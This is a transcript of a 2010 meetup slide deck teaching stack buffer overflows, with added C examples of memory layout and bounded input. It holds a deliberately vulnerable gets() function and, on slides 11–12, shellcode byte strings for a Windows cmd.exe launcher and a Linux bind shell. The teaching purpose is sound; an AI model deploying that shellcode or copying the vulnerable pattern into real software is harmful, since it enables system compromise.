Buffer Overflow Demo by Saurabh Sharma

Buffer Overflow Demo by Saurabh Sharma @ null Bangalore Meet, June 2010

Transcript

  • 1. Buffer Overflows
    by: Saurabh Sharma
  • 2. BUFFER
  • 3. Anatomy of Buffer Overflows
    Buffer: the memory area where user input is stored.
    Overflow: the user input exceeds the maximum size of the buffer, overwriting adjacent areas of memory and corrupting them.
  • 4. A small example
    #include <stdio.h>

    /* Deliberately vulnerable: gets() reads until newline with no bound,
       so input longer than the buffer overwrites whatever follows buf. */
    void get_input(void) {
        char buf[1024];
        gets(buf);
    }

    int main(int argc, char *argv[]) {
        get_input();
        return 0;
    }
    The user controls the input. A malicious user can supply input of more than 500 chars. So what?
    The user can supply malicious input that executes some other program. That program can be cmd.exe, which may lead to full system compromise.
  • 5. Memory overview
    Text: contains instructions
    Data: contains initialized variables
    BSS: contains uninitialized global and static variables (initialized to 0)
    Heap: contains dynamic, uninitialized data (malloc())
    Stack: contains function arguments and local variables
  • 6. Memory overview
    Stack frame: holds the variables and data for a function
    Stack grows from higher memory addresses to lower memory addresses
    Heap: grows from lower to higher
  • 7. REGISTERS
    General purpose: for basic calculations.
    ESI, EDI: used mostly with arrays
    Flags: the outcome of several instructions sets the flags
    Segment: code, stack, data.
    EBP: base pointer, points to the beginning of the current stack frame
    ESP: stack pointer, points to the top of the stack
    EIP: instruction pointer, points to the next instruction
  • 8. Stack Layout
    The stack is a LIFO data structure: temporary memory, formed when a function is called.
    A new stack frame is created when the function is called.
    The return address is saved just above the local variables.
    (Diagram: parameters, return address (saved EIP), saved EBP, local variables, with the stack growing toward lower addresses.)
  • 9. Stack Layout
    So, if the EIP can be controlled, the next instruction to be executed can be controlled.
    (Same diagram as slide 8.)
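The following program is an added illustration of slides 5, 6 and 8 and is not part of the original deck. It places one object in each region the slides name (text, data, BSS, heap, stack), prints their addresses, and checks the one claim that can be verified portably from C: a called function's locals sit at a lower address than the caller's, so the stack grows from higher to lower addresses. The function names are my own; the noinline attribute is a GCC/Clang extension used so the callee really gets its own frame.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int initialized_global = 42;   /* data segment: initialized variable */
int uninitialized_global;      /* BSS: uninitialized, zeroed by the loader */

/* noinline keeps this a real call, so it gets a stack frame of its own. */
__attribute__((noinline))
static int callee_frame_is_below(uintptr_t caller_local_addr) {
    volatile char callee_local = 0;
    /* Compared as integers: a new frame is pushed toward lower addresses. */
    return (uintptr_t)&callee_local < caller_local_addr;
}

/* Returns 1 when the callee's locals lie below the caller's locals,
   i.e. the stack grows from higher to lower addresses (slide 6). */
int stack_grows_down(void) {
    volatile char caller_local = 0;
    return callee_frame_is_below((uintptr_t)&caller_local);
}

/* Returns 1 when an uninitialized global reads as 0 (the BSS rule on slide 5). */
int bss_is_zeroed(void) {
    return uninitialized_global == 0;
}

/* Prints one address per region so the layout on the slide can be seen.
   Exact placement is up to the OS loader and ASLR; only the relative
   order is typical, and only the stack direction is guaranteed here. */
void print_memory_overview(void) {
    volatile int stack_local = 0;
    int *heap_block = malloc(sizeof *heap_block);
    if (heap_block == NULL) {
        return;
    }
    printf("text  (function code):      0x%" PRIxPTR "\n",
           (uintptr_t)print_memory_overview);
    printf("data  (initialized global): 0x%" PRIxPTR "\n",
           (uintptr_t)&initialized_global);
    printf("bss   (uninitialized glob): 0x%" PRIxPTR "\n",
           (uintptr_t)&uninitialized_global);
    printf("heap  (malloc block):       0x%" PRIxPTR "\n",
           (uintptr_t)heap_block);
    printf("stack (local variable):     0x%" PRIxPTR "\n",
           (uintptr_t)&stack_local);
    free(heap_block);
}

int main(void) {
    print_memory_overview();
    printf("stack grows down: %d, bss zeroed: %d\n",
           stack_grows_down(), bss_is_zeroed());
    return 0;
}
```

Run it twice with ASLR enabled and the stack, heap and code addresses move, but the ordering of the regions and the downward growth of the stack do not; that downward growth is exactly why an over-long write into a local buffer reaches the saved EBP and return address above it.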
  • 10. SHELLCODE
    Machine code that is injected into the overflowed buffer
    Does the work for you
    WORK: executing a third program, adding an administrator, etc.
  • 11. EXAMPLE SHELLCODES (SMALL)
    win32/xp sp2 (En) cmd.exe 23 bytes
    Author: MountassifMoad A.K.A :
    "x8bxecx68x65x78x65" "x20x68x63x6dx64x2e" "x8dx45xf8x50xb8x8D" "x15x86x7Cxffxd0";
  • 12. EXAMPLE SHELLCODES (bigger)
    /* BY NRAZIZ */ /* Binds to port 48138, password: haxor */ char bindcode[] =
    "x31xdbx53x43x53x6ax02x89xe1xb0x66xcdx80" "x31xd2x52x66x68xbcx0ax66x6ax02x89xe2x6a" "x10x52x6ax03x89xe1xfexc3xb0x66xcdx80x6a" "x02x6ax03x89xe1xb3x04xb0x66xcdx80x31xc9" "x51x51x6ax03x89xe1xfexc3xb0x66xcdx80x31" "xdbx53x6ax3ax68x50x61x73x73x89xe6x6ax05" "x56x6ax04x89xe1xb3x09xb0x66xcdx80x31xc9" "x31xf6x51x6ax05x52x6ax04x89xe1xb3x0axb0" "x66xcdx80x31xc9x51x6ax72x68x68x61x78x6f" "x89xe7x89xd6x80xc1x05xfcxf3xa6x75xbfx31" "xc9xb3x04xb0x3fxcdx80x41x83xf9x03x75xf6" "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6e" "x89xe3x50x53x89xe1x31xd2xb0x0bxcdx80xb0" "x01xcdx80"
  • 13. DEMO
  • 14. MAJOR SNARES
    strcpy()
    strcat()
    sprintf()
    scanf()
    sscanf()
    fscanf()
    vfscanf()
    vsprintf()
    vscanf()
    vsscanf()
    streadd()
    strecpy()
    strtrns()
  • 15. PREVENTION
    The buffer size must be checked.
    Use bounded alternatives, e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src).
    Other protection mechanisms: /GS (stack cookie), ASLR, SafeSEH compilation.
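As an added example (my code, not the deck's), here is the hardened counterpart of the get_input() on slide 4 and of the strncpy() advice on slide 15. get_input_bounded() replaces gets() with fgets() and drains the rest of an over-long line, so the leftover bytes cannot be read as the next input. copy_bounded() shows the caveat the slide's one-liner hides: strncpy() does not NUL-terminate when the source is longer than the count, so the final byte has to be written explicitly. The demo functions feed constructed input through fmemopen(), which is POSIX rather than standard C; all function names are my own.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024   /* same buffer size as the deck's get_input() */

/* Bounded replacement for gets(buf): reads at most size-1 bytes, always
   NUL-terminates, and discards the remainder of an over-long line.
   Returns 0 if the whole line fit, 1 if it was truncated, -1 on EOF/error. */
int get_input_bounded(char *buf, size_t size, FILE *in) {
    if (size == 0 || fgets(buf, (int)size, in) == NULL) {
        if (size > 0) buf[0] = '\0';
        return -1;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';          /* strip the newline: line fit */
        return 0;
    }
    if (feof(in)) return 0;           /* final line without newline, fully read */
    int c;                            /* line longer than buffer: drain it */
    while ((c = fgetc(in)) != EOF && c != '\n') { }
    return 1;
}

/* The slide's strncpy(dst, src, dst_size-1) plus the missing terminator.
   Returns 1 when src did not fit and was truncated, 0 otherwise. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    if (dst_size == 0) return 1;
    strncpy(dst, src, dst_size - 1);  /* does NOT terminate if src is too long */
    dst[dst_size - 1] = '\0';         /* so terminate unconditionally */
    return strlen(src) >= dst_size;
}

/* Constructed input: a 1500-byte line (the overflow case) then "short".
   Returns 1 when the long line is truncated to BUF_SIZE-1 bytes and the
   following line is still read intact. */
int demo_overlong_line(void) {
    static char sample[1500 + 8];
    memset(sample, 'A', 1500);
    memcpy(sample + 1500, "\nshort\n", 8);   /* includes the NUL */
    FILE *in = fmemopen(sample, strlen(sample), "r");
    if (in == NULL) return -1;
    char first[BUF_SIZE], second[BUF_SIZE];
    int r1 = get_input_bounded(first, sizeof first, in);
    int r2 = get_input_bounded(second, sizeof second, in);
    fclose(in);
    return r1 == 1 && strlen(first) == BUF_SIZE - 1
        && r2 == 0 && strcmp(second, "short") == 0;
}

/* Returns 1 when copy_bounded() truncates an over-long source safely and
   copies a short source unchanged. */
int demo_copy_bounded(void) {
    char dst[8];
    int truncated = copy_bounded(dst, sizeof dst, "0123456789");
    int ok_long = truncated == 1 && strcmp(dst, "0123456") == 0;
    truncated = copy_bounded(dst, sizeof dst, "abc");
    int ok_short = truncated == 0 && strcmp(dst, "abc") == 0;
    return ok_long && ok_short;
}

int main(void) {
    printf("over-long line handled: %d\n", demo_overlong_line());
    printf("bounded copy handled:   %d\n", demo_copy_bounded());
    return 0;
}
```

The return value of each helper tells the caller that truncation happened, which is the check the slide asks for: a program that silently drops bytes can still misbehave, so log or reject the input rather than ignore it. The compiler protections the slide lists are separate from this code; /GS is the MSVC stack cookie, and GCC and Clang provide the same idea under -fstack-protector.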
  • 16. REFERENCES
    http://www.cccure.org/amazon/idssignature.pdf
    http://www.shell-storm.org/papers/files/539.pdf
    http://c0re.23.nu/~chris/data/bo-2004.pdf
    http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf
  • 17. QUESTIONS
